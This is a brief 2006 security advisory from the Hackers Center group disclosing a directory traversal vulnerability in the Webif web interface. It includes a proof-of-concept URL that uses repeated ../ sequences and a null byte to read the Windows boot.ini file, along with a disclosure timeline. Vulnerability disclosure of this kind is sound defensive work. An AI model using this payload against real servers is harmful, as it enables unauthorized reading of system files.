|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Tuesday, 28 February 2006 21:35 |
 Title:
Webif directory traversal
Affected Software:
Webif - http://www.ifnet.it/webif
WebIf allows the interrogation through Web interface.
Vulnerability Type:
Webif directory traversal
Proof of concept:
http://[victim]/webif/cgi-bin/webif.exe?cmd=query&config=c:/inetpub/wwwroot/webif/config/config.txt&outconfig=
../../../../../../../../../../boot.ini%00
Disclosure time line:
The vendor has been contacted 3 weeks ago
Credit:
spher3
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
www.hackerscenter.com
|
